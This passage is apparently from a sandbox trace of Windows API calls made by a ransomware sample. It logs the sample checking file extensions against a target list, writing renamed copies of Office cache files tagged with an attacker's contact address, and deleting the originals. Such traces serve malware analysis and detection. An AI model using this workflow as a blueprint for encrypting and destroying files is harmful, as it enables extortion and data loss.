lpNumberOfBytesWritten=0x2cafc9c*=0x760, lpOverlapped=0x0) returned 1 [0034.887] ReadFile (in: hFile=0x19c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.887] WriteFile (in: hFile=0x1a4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.887] SetEndOfFile (hFile=0x1a4) returned 1 [0034.887] CloseHandle (hObject=0x1a4) returned 1 [0034.888] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.888] SetEndOfFile (hFile=0x19c) returned 1 [0034.889] CloseHandle (hObject=0x19c) returned 1 [0034.889] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.889] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.889] lstrlenW (lpString=".doc") returned 4 [0034.889] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.889] lstrlenW (lpString=".docx") returned 5 [0034.889] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.889] lstrlenW (lpString=".pdf") returned 4 [0034.889] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.890] lstrlenW (lpString=".xls") returned 4 [0034.890] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.890] lstrlenW (lpString=".xlsx") returned 5 [0034.890] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.890] lstrlenW (lpString=".ppt") returned 4 [0034.890] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.890] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.890] lstrlenW (lpString=".zip") returned 4 [0034.890] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.890] lstrlenW (lpString=".rar") returned 4 [0034.890] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.890] lstrlenW (lpString=".bz2") returned 4 [0034.890] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.890] lstrlenW (lpString=".7z") returned 3 [0034.890] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.890] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.890] lstrlenW (lpString=".dbf") returned 4 [0034.890] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.890] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.890] lstrlenW (lpString=".1cd") returned 4 [0034.890] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.890] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.890] lstrlenW (lpString=".jpg") returned 4 [0034.890] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.890] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.890] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.890] lstrlenW (lpString=".doc") returned 4 [0034.890] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.890] lstrlenW (lpString=".docx") returned 5 [0034.890] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.890] lstrlenW (lpString=".pdf") returned 4 [0034.890] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.890] lstrlenW (lpString=".xls") returned 4 [0034.891] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.891] lstrlenW (lpString=".xlsx") returned 5 [0034.891] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.891] lstrlenW (lpString=".ppt") returned 4 [0034.891] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.891] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.891] lstrlenW (lpString=".zip") returned 4 [0034.891] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.891] lstrlenW (lpString=".rar") returned 4 [0034.891] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.891] lstrlenW (lpString=".bz2") returned 4 [0034.891] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.891] lstrlenW (lpString=".7z") returned 3 [0034.891] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.891] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.891] lstrlenW (lpString=".dbf") returned 4 [0034.891] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.891] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.891] lstrlenW (lpString=".1cd") returned 4 [0034.891] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.891] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.891] lstrlenW (lpString=".jpg") returned 4 [0034.891] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.891] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.891] lstrlenW (lpString="AccessMUISet.xml") returned 16 [0034.891] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.892] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=819) returned 1 [0034.892] CloseHandle (hObject=0x19c) returned 1 [0034.892] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 0x2020 [0034.892] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.892] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.892] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.892] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.892] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.892] GetLastError () returned 0x0 [0034.892] ReadFile (in: hFile=0x19c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x333, lpOverlapped=0x0) returned 1 [0034.894] WriteFile (in: hFile=0x1a4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x340, lpOverlapped=0x0) returned 1 [0034.895] ReadFile (in: hFile=0x19c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.895] WriteFile (in: hFile=0x1a4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xf4, lpOverlapped=0x0) returned 1 [0034.895] SetEndOfFile (hFile=0x1a4) returned 1 [0034.895] CloseHandle (hObject=0x1a4) returned 1 [0034.896] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.896] SetEndOfFile (hFile=0x19c) returned 1 [0034.896] CloseHandle (hObject=0x19c) returned 1 [0034.897] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.897] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 1 [0034.897] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0034.897] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0034.897] lstrlenW (lpString=".doc") returned 4 [0034.897] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.897] lstrlenW (lpString=".docx") returned 5 [0034.897] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0034.897] lstrlenW (lpString=".pdf") returned 4 [0034.897] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.897] lstrlenW (lpString=".xls") returned 4 [0034.897] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.897] lstrlenW (lpString=".xlsx") returned 5 [0034.897] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0034.897] lstrlenW (lpString=".ppt") returned 4 [0034.897] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.897] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0034.897] lstrlenW (lpString=".zip") returned 4 [0034.897] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.897] lstrlenW (lpString=".rar") returned 4 [0034.898] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.898] lstrlenW (lpString=".bz2") returned 4 [0034.898] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.898] lstrlenW (lpString=".7z") returned 3 [0034.898] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0034.898] lstrlenW (lpString=".dbf") returned 4 [0034.898] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0034.898] lstrlenW (lpString=".1cd") returned 4 [0034.898] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0034.898] lstrlenW (lpString=".jpg") returned 4 [0034.898] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0034.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0034.898] lstrlenW (lpString=".doc") returned 4 [0034.898] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.898] lstrlenW (lpString=".docx") returned 5 [0034.898] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0034.898] lstrlenW (lpString=".pdf") returned 4 [0034.898] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.898] lstrlenW (lpString=".xls") returned 4 [0034.898] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.898] lstrlenW (lpString=".xlsx") returned 5 [0034.898] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0034.898] lstrlenW (lpString=".ppt") returned 4 [0034.898] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0034.898] lstrlenW (lpString=".zip") returned 4 [0034.898] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.898] lstrlenW (lpString=".rar") returned 4 [0034.899] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.899] lstrlenW (lpString=".bz2") returned 4 [0034.899] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.899] lstrlenW (lpString=".7z") returned 3 [0034.899] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.899] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0034.899] lstrlenW (lpString=".dbf") returned 4 [0034.899] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.899] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0034.899] lstrlenW (lpString=".1cd") returned 4 [0034.899] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.899] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0034.899] lstrlenW (lpString=".jpg") returned 4 [0034.899] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.899] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.899] lstrlenW (lpString="Setup.xml") returned 9 [0034.899] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.899] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=2624) returned 1 [0034.899] CloseHandle (hObject=0x19c) returned 1 [0034.900] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.900] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.900] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.900] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.900] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.900] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.900] GetLastError () returned 0x0 [0034.900] ReadFile (in: hFile=0x19c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0xa40, lpOverlapped=0x0) returned 1 [0034.902] WriteFile (in: hFile=0x1a4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xa50, lpOverlapped=0x0) returned 1 [0034.903] ReadFile (in: hFile=0x19c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.903] WriteFile (in: hFile=0x1a4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.903] SetEndOfFile (hFile=0x1a4) returned 1 [0034.903] CloseHandle (hObject=0x1a4) returned 1 [0034.903] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.903] SetEndOfFile (hFile=0x19c) returned 1 [0034.904] CloseHandle (hObject=0x19c) returned 1 [0034.904] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.904] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.905] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.905] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.905] lstrlenW (lpString=".doc") returned 4 [0034.905] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.905] lstrlenW (lpString=".docx") returned 5 [0034.905] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.905] lstrlenW (lpString=".pdf") returned 4 [0034.905] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.905] lstrlenW (lpString=".xls") returned 4 [0034.905] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.905] lstrlenW (lpString=".xlsx") returned 5 [0034.905] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.905] lstrlenW (lpString=".ppt") returned 4 [0034.905] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.905] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.905] lstrlenW (lpString=".zip") returned 4 [0034.905] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.905] lstrlenW (lpString=".rar") returned 4 [0034.905] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.905] lstrlenW (lpString=".bz2") returned 4 [0034.905] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.905] lstrlenW (lpString=".7z") returned 3 [0034.905] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.905] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.905] lstrlenW (lpString=".dbf") returned 4 [0034.905] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.905] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.905] lstrlenW (lpString=".1cd") returned 4 [0034.905] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.906] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.906] lstrlenW (lpString=".jpg") returned 4 [0034.906] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.906] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.906] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.906] lstrlenW (lpString=".doc") returned 4 [0034.906] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.906] lstrlenW (lpString=".docx") returned 5 [0034.906] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.906] lstrlenW (lpString=".pdf") returned 4 [0034.906] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.906] lstrlenW (lpString=".xls") returned 4 [0034.906] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.906] lstrlenW (lpString=".xlsx") returned 5 [0034.906] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.906] lstrlenW (lpString=".ppt") returned 4 [0034.906] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.906] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.906] lstrlenW (lpString=".zip") returned 4 [0034.906] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.906] lstrlenW (lpString=".rar") returned 4 [0034.906] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.906] lstrlenW (lpString=".bz2") returned 4 [0034.906] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.906] lstrlenW (lpString=".7z") returned 3 [0034.906] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.906] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.906] lstrlenW (lpString=".dbf") returned 4 [0034.906] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.906] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.906] lstrlenW (lpString=".1cd") returned 4 [0034.906] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.906] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.907] lstrlenW (lpString=".jpg") returned 4 [0034.907] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.907] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.907] lstrlenW (lpString="Office32WW.xml") returned 14 [0034.907] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.908] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=4274) returned 1 [0034.908] CloseHandle (hObject=0x19c) returned 1 [0034.908] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0034.908] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.908] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.909] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.909] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.909] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.909] GetLastError () returned 0x0 [0034.909] ReadFile (in: hFile=0x19c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, 